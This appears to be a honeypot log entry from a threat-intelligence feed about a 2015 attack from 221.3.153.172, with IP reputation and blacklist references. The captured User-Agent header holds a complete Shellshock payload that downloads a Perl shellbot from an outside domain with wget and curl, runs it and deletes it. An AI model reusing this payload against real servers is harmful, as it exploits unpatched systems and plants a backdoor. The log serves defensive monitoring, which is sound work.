221.3.153.172 - Backdoor Perl Shellbot via http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh
BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close
221.3.153[.]172
Static Source: GeoIP data
- Country: China
- ASN: AS4837 CNCGROUP China169 Backbone
Dynamic Source: SANS Internet Storm Cast
- comment:IP is listed on SANS ISC
- comment:This entry alone does not indicate a threat, please check the link
- Reference: https://isc.sans.edu/api/ip/221.3.153.172
Static Source: panwdbl.appspot.com
- Comment: Listed in open blacklist
- Reference: https://panwdbl.appspot.com/lists/openbl.txt
Static Source: http://sendmespamids.blogspot.nl/ Blacklist
- Comment: Listed on Honeypot blacklist
- Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt
Feed search for 221.3.153[.]172
Source: Local Feed Database
- Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
- Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
- In db since: 2015-10-21 13:01:19.504158